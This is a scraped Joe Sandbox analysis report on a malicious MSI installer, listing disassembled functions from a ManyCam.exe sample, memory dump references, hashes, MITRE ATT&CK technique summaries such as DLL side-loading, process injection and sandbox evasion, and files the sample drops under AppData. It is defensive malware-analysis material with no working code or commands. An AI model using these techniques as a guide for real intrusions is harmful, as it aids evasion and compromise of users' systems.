Function 00C40880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

cvRegisterType.GLU32 ref: 00C408CC

Part of subcall function 00C275D0: isalpha.MSVCR80 ref: 00C27619
Part of subcall function 00C275D0: cvError.GLU32(000000FB,cvRegisterType,Type name should start with a letter or _,.\cxpersistence.cpp,000012F6), ref: 00C27641

Part of subcall function 00C3FE87: __onexit.MSVCRT ref: 00C3FE8B

Strings

opencv-matrix, xrefs: 00C4089C
(, xrefs: 00C40894

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorRegisterType__onexitisalpha
String ID: ($opencv-matrix
API String ID: 3878073915-1333336925
Opcode ID: cc13fa7d96c6af109d22de030da11dfb5b09e506f899782055ec1e4cee4baebb
Instruction ID: ef2ab80df9ff7496fae24175c757777a93a2718f00a4b589e7f6620302962cd8
Opcode Fuzzy Hash: cc13fa7d96c6af109d22de030da11dfb5b09e506f899782055ec1e4cee4baebb
Instruction Fuzzy Hash: 9DF0F2F94083159FC740EF15D48921FBFE0BB98348F508D6DE4D896620E7B482888F82

Function 00C40810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

cvRegisterType.GLU32 ref: 00C4085C

Part of subcall function 00C275D0: isalpha.MSVCR80 ref: 00C27619
Part of subcall function 00C275D0: cvError.GLU32(000000FB,cvRegisterType,Type name should start with a letter or _,.\cxpersistence.cpp,000012F6), ref: 00C27641

Part of subcall function 00C3FE87: __onexit.MSVCRT ref: 00C3FE8B

Strings

opencv-image, xrefs: 00C4082C
(, xrefs: 00C40824

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorRegisterType__onexitisalpha
String ID: ($opencv-image
API String ID: 3878073915-842771745
Opcode ID: a8b6b8e2309435c05f9a2748de82bc236dfca9ce53f3028dbbc284f701c8d28e
Instruction ID: 94e091d56c5f3bd84270c77a563b37192d5370b35de1fc1d88e8c0dba1dd9a28
Opcode Fuzzy Hash: a8b6b8e2309435c05f9a2748de82bc236dfca9ce53f3028dbbc284f701c8d28e
Instruction Fuzzy Hash: 77F0DFF44183509FC744EF25E48520FBBE4BF88348F508D6DE48996260E7B182888F96

Function 00523211 Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?,0000040A,00000000), ref: 0052318D
HeapAlloc.KERNEL32(00000000,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?,0000040A,00000000,00000000), ref: 00523194

Part of subcall function 0052309D: IsProcessorFeaturePresent.KERNEL32(0000000C,?,0052317B,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?,0000040A), ref: 005230A0

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?), ref: 005231B6
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004086D8,?,00408648,0000000D,0040858E,00000000,?,?,00406405,0000040A,?), ref: 005231E3

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocHeapVirtual$FeatureFreePresentProcessProcessor
String ID:
API String ID: 4058086966-0
Opcode ID: 0c4867eb5bd92bb6381ce8f4e327ffa02bccf704549b714ad9cee9f0e79b5bb8
Instruction ID: b5a60a9bbef02a3c563d751fc20c4e74480abeb514ab3cab8f797184bd5a284a
Opcode Fuzzy Hash: 0c4867eb5bd92bb6381ce8f4e327ffa02bccf704549b714ad9cee9f0e79b5bb8
Instruction Fuzzy Hash: 3711D631240231AFEB21176CFC0AB663E65BF67741F100820FA11D62E0D738CD08EAA0

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kvW4hZu9JA.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\5fd64e.rbs

C:\Users\user\AppData\Local\Hazan\CrashRpt.dll

C:\Users\user\AppData\Local\Hazan\ManyCam.exe

C:\Users\user\AppData\Local\Hazan\cv099.dll

C:\Users\user\AppData\Local\Hazan\cxcore099.dll

C:\Users\user\AppData\Local\Hazan\cximagecrt.dll

C:\Users\user\AppData\Local\Hazan\dbghelp.dll

C:\Users\user\AppData\Local\Hazan\gxfiogr

C:\Users\user\AppData\Local\Hazan\highgui099.dll

C:\Users\user\AppData\Local\Hazan\rsjddfw

C:\Users\user\AppData\Local\Temp\a19aeeb0

C:\Users\user\AppData\Local\Temp\b72d587a

C:\Users\user\AppData\Local\Temp\be1e7cd8

C:\Users\user\AppData\Local\Temp\blggjuprkr

C:\Users\user\AppData\Local\Temp\ffjc

C:\Users\user\AppData\Local\Temp\klxgok

C:\Users\user\AppData\Roaming\gjs_channel_x86\CrashRpt.dll

C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe

Windows Analysis Report
kvW4hZu9JA.msi

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre